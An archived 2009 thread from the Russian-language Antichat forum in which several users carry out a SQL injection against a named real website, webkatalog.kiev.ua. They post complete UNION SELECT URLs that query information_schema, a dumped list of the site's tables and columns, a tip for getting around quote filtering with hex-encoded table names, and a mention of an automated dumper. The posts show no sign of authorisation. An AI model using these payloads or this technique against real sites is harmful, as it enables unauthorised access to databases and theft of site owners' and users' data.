ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7801  
Старый 22.06.2009, 23:32
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13,14,15,16,17+from+information_schema.tables+--

ТЫ не поставил комментарий, он нужен для того чтобы обрубить "AND status=1 ORDER BY ocenka desc, view desc, date2 asc LIMIT 0,10 "
 
Ответить с цитированием

  #7802  
Старый 22.06.2009, 23:33
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

так там всего 3 поля, откуда ты 17 то взял?
Вот в виде table_schema,table_name,column_name:
Код:
webkat_baze:0links:id
webkat_baze:0links:name
webkat_baze:0links:text
webkat_baze:0links:url
webkat_baze:0links:date1
webkat_baze:0links:date2
webkat_baze:kat:id
webkat_baze:kat:name
webkat_baze:links_partner:date
webkat_baze:links_partner:links
webkat_baze:links_partner:id
webkat_baze:site:id
webkat_baze:site:kat
webkat_baze:site:subkat
webkat_baze:site:url
webkat_baze:site:name
webkat_baze:site:info
webkat_baze:site:keywords
webkat_baze:site:status
webkat_baze:site:date
webkat_baze:site:date2
webkat_baze:site:iphost
webkat_baze:site:view
webkat_baze:site:user
webkat_baze:site:email
webkat_baze:site:nashbutton
webkat_baze:site:ocenka
webkat_baze:site:tmp2
webkat_baze:subkat:id
webkat_baze:subkat:kat
webkat_baze:subkat:name

Последний раз редактировалось M.W.N.N.; 22.06.2009 в 23:37..
 
Ответить с цитированием

  #7803  
Старый 22.06.2009, 23:36
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1%20union%20select+1,2,3,4,column_name,6,7,8,9,10, 11,12,13,14,15,16,17%20from%20information_schema.c olumns+where+table_name=0x555345525f50524956494c45 474553+--&page=1
 
Ответить с цитированием

  #7804  
Старый 22.06.2009, 23:36
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

M.W.N.N., я тоже сначала так считал, но при 3-х полях мне не выводился принтабельный столбец!
 
Ответить с цитированием

  #7805  
Старый 22.06.2009, 23:39
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Все там отлично выводится, принтабельное поле после слов: Каталог > Авто/мото >

Смотри выше, я выложил в пред идущем посте таблицы и колонки

Последний раз редактировалось M.W.N.N.; 22.06.2009 в 23:48..
 
Ответить с цитированием

  #7806  
Старый 22.06.2009, 23:47
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

M.W.N.N., можешь рассказать, как ты такую таблицу вывел, пожалуйста)
 
Ответить с цитированием

  #7807  
Старый 22.06.2009, 23:50
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Через дампер
 
Ответить с цитированием

  #7808  
Старый 23.06.2009, 00:15
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

Krist_ALL, может и тупой вопрос, но всё же, почему же тогда запрос http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1+union+select+1,2,3,4,column_name,6,7,8,9,10,11,1 2,13,14,15,16,17+from+information_schema.columns+w here+table_name=%27user%27+--
не катит?)
 
Ответить с цитированием

  #7809  
Старый 23.06.2009, 00:23
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Цитата:
Сообщение от jecka3000  
Krist_ALL, может и тупой вопрос, но всё же, почему же тогда запрос http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1+union+select+1,2,3,4,column_name,6,7,8,9,10,11,1 2,13,14,15,16,17+from+information_schema.columns+w here+table_name=%27user%27+--
не катит?)
нет там таблицы user, и в любом случае при таком методе имя таблицы переводи в HEX, когда кавычки фильтруются.
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием

  #7810  
Старый 23.06.2009, 00:38
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

Чтобы руками не перебирать все, юзаем sipt. но КТО НЕ ЗНАЕТ КАК СДЕЛАТЬ РУКАМИ ИНЕКЦИЮ НЕ ЮЗАЙТЕ СИПТ! Если что-то делать, так с умом.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ